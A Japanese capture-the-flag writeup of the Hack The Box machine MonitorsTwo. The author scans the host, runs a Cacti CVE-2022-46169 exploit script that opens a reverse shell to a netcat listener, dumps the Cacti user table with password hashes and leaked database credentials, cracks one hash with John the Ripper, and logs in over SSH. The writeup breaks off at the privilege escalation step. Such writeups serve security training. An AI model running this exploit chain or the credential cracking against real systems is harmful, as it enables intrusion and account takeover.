🐹
[Hack The Box]Monitors2 writeup
USER PRIVILEGES
nmap
┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.189 -sSV -Pn
[sudo] kali のパスワード:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 18:46 JST
NSE: Loaded 46 scripts for scanning.
Initiating SYN Stealth Scan at 18:46
Scanning 10.10.11.189 [1000 ports]
Completed SYN Stealth Scan at 18:46, 1.12s elapsed (1000 total ports)
Initiating Service scan at 18:46
NSE: Script scanning 10.10.11.189.
Initiating NSE at 18:46
Completed NSE at 18:46, 0.00s elapsed
Initiating NSE at 18:46
Completed NSE at 18:46, 0.00s elapsed
Nmap scan report for 10.10.11.189
Host is up.
All 1000 scanned ports on 10.10.11.189 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
Raw packets sent: 2000 (88.000KB) | Rcvd: 0 (0B)
ffuf
┌──(kali㉿kali)-[/home/kali.org]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.211/FUZZ -c -v
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.211/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 13844, Words: 600, Lines: 273, Duration: 476ms]
| URL | http://10.10.11.211/#
* FUZZ: #
/CHANGELOGやpluginsなど面白そうなものは見つかったが有益な情報は得られず
web enumeration
Cacti Untuthenticated RCE(CVE-2022-46169)
この記事によるとCacti<=1.2.22での認証バイパスとコマンドインジェクションを連鎖させた脆弱性があるらしい
CVE-2022-46169.pyの使い方はこうだ
┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ python3 CVE-2022-46169.py -h
Usage: CVE-2022-46169.py [options]
Options:
-h, --help show this help message and exit
-u URL_TARGET, --url=URL_TARGET
The url target
--LHOST=LHOST Your ip
--LPORT=LPORT The listening port
┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ python3 CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.36 --LPORT=4444
Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!
ncでリッスンする
┌──(kali㉿kali)-[/home/kali.org]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.11.211] 54826
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$
返ってきた!!
中を探索して、/homeなどを確認するがuser.txtは見当たらず…
するとルートディレクトリにentrypoint.shなるものを発見した
www-data@50bca5e748b0:/$ ll
total 84
drwxr-xr-x 1 root root 4096 Mar 21 2023 .
drwxr-xr-x 1 root root 4096 Mar 21 2023 ..
-rwxr-xr-x 1 root root 0 Mar 21 2023 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 22 2023 bin
drwxr-xr-x 2 root root 4096 Mar 22 2023 boot
drwxr-xr-x 5 root root 340 Dec 10 08:08 dev
-rw-r--r-- 1 root root 648 Jan 5 2023 entrypoint.sh
drwxr-xr-x 1 root root 4096 Mar 21 2023 etc
drwxr-xr-x 2 root root 4096 Mar 22 2023 home
drwxr-xr-x 1 root root 4096 Nov 15 2022 lib
drwxr-xr-x 2 root root 4096 Mar 22 2023 lib64
drwxr-xr-x 2 root root 4096 Mar 22 2023 media
drwxr-xr-x 2 root root 4096 Mar 22 2023 mnt
drwxr-xr-x 2 root root 4096 Mar 22 2023 opt
dr-xr-xr-x 274 root root 0 Dec 10 08:08 proc
drwx------ 1 root root 4096 Mar 21 2023 root
drwxr-xr-x 1 root root 4096 Nov 15 2022 run
drwxr-xr-x 1 root root 4096 Jan 9 2023 sbin
drwxr-xr-x 2 root root 4096 Mar 22 2023 srv
dr-xr-xr-x 13 root root 0 Dec 10 08:08 sys
drwxrwxrwt 1 root root 4096 Dec 10 09:30 tmp
drwxr-xr-x 1 root root 4096 Nov 14 2022 usr
drwxr-xr-x 1 root root 4096 Nov 15 2022 var
entrypoint.sh
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
mysql --host=db --user=root --password=root cacti -e "show tables;"
< --user=root --password=root cacti -e "show tables;"
+-------------------------------------+
| Tables_in_cacti |
+-------------------------------------+
| aggregate_graph_templates |
| aggregate_graph_templates_graph |
| aggregate_graph_templates_item |
| aggregate_graphs |
| aggregate_graphs_graph_item |
| aggregate_graphs_items |
| automation_devices |
| automation_graph_rule_items |
| automation_graph_rules |
| automation_ips |
| automation_match_rule_items |
| automation_networks |
| automation_processes |
| automation_snmp |
| automation_snmp_items |
| automation_templates |
| automation_tree_rule_items |
| automation_tree_rules |
| cdef |
| cdef_items |
| color_template_items |
| color_templates |
| colors |
| data_debug |
| data_input |
| data_input_data |
| data_input_fields |
| data_local |
| data_source_profiles |
| data_source_profiles_cf |
| data_source_profiles_rra |
| data_source_purge_action |
| data_source_purge_temp |
| data_source_stats_daily |
| data_source_stats_hourly |
| data_source_stats_hourly_cache |
| data_source_stats_hourly_last |
| data_source_stats_monthly |
| data_source_stats_weekly |
| data_source_stats_yearly |
| data_template |
| data_template_data |
| data_template_rrd |
| external_links |
| graph_local |
| graph_template_input |
| graph_template_input_defs |
| graph_templates |
| graph_templates_gprint |
| graph_templates_graph |
| graph_templates_item |
| graph_tree |
| graph_tree_items |
| host |
| host_graph |
| host_snmp_cache |
| host_snmp_query |
| host_template |
| host_template_graph |
| host_template_snmp_query |
| plugin_config |
| plugin_db_changes |
| plugin_hooks |
| plugin_realms |
| poller |
| poller_command |
| poller_data_template_field_mappings |
| poller_item |
| poller_output |
| poller_output_boost |
| poller_output_boost_local_data_ids |
| poller_output_boost_processes |
| poller_output_realtime |
| poller_reindex |
| poller_resource_cache |
| poller_time |
| processes |
| reports |
| reports_items |
| sessions |
| settings |
| settings_tree |
| settings_user |
| settings_user_group |
| sites |
| snmp_query |
| snmp_query_graph |
| snmp_query_graph_rrd |
| snmp_query_graph_rrd_sv |
| snmp_query_graph_sv |
| snmpagent_cache |
| snmpagent_cache_notifications |
| snmpagent_cache_textual_conventions |
| snmpagent_managers |
| snmpagent_managers_notifications |
| snmpagent_mibs |
| snmpagent_notifications_log |
| user_auth |
| user_auth_cache |
| user_auth_group |
| user_auth_group_members |
| user_auth_group_perms |
| user_auth_group_realm |
| user_auth_perms |
| user_auth_realm |
| user_domains |
| user_domains_ldap |
| user_log |
| vdef |
| vdef_items |
| version |
+-------------------------------------+
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"
<--user=root --password=root cacti -e "select * from user_auth;"
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password | realm | full_name | email_address | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| 1 | admin | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC | 0 | Jamie Thompson | admin@monitorstwo.htb | | on | on | on | on | on | 2 | 1 | 1 | 1 | 1 | on | -1 | -1 | -1 | | 0 | 0 | 663348655 |
| 3 | guest | 43e9a4ab75570f5b | 0 | Guest Account | | on | on | on | on | on | 3 | 1 | 1 | 1 | 1 | 1 | | -1 | -1 | -1 | | 0 | 0 | 0 |
| 4 | marcus | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C | 0 | Marcus Brune | marcus@monitorstwo.htb | | | on | on | on | on | 1 | 1 | 1 | 1 | 1 | on | -1 | -1 | | on | 0 | 0 | 2135691668 |
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
john the ripper
ハッシュ値をクラックするツールであるjohnを使う
hashcatでも同様のことができる
admin、guestのパスワードでもクラックしてみたが、結果上手くいったのはmarcusのパスワードだった
┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt marcus.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey (?)
1g 0:00:01:31 DONE (2023-12-10 18:41) 0.01096g/s 93.52p/s 93.52c/s 93.52C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
あとはsshで接続したらよいだけですね
┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh marcus@10.10.11.211
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 11 Dec 2023 06:04:35 AM UTC
System load: 0.08
Usage of /: 63.8% of 6.73GB
Memory usage: 22%
Swap usage: 0%
Processes: 240
Users logged in: 0
IPv4 address for br-60ea49c21773: 172.18.0.1
IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.211
IPv6 address for eth0: dead:beef::250:56ff:feb9:dd85
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
You have mail.
Last login: Thu Mar 23 10:12:28 2023 from 10.10.14.40
marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt
user.txtゲット!
PRIVILEGE ESCALATION
sudo -l
marcusの権限で実行できるものはなさそうですね
marcus@monitorstwo:~$ sudo -l
[sudo] password for marcus:
Sorry, user marcus may not run sudo on localhost.
Discussion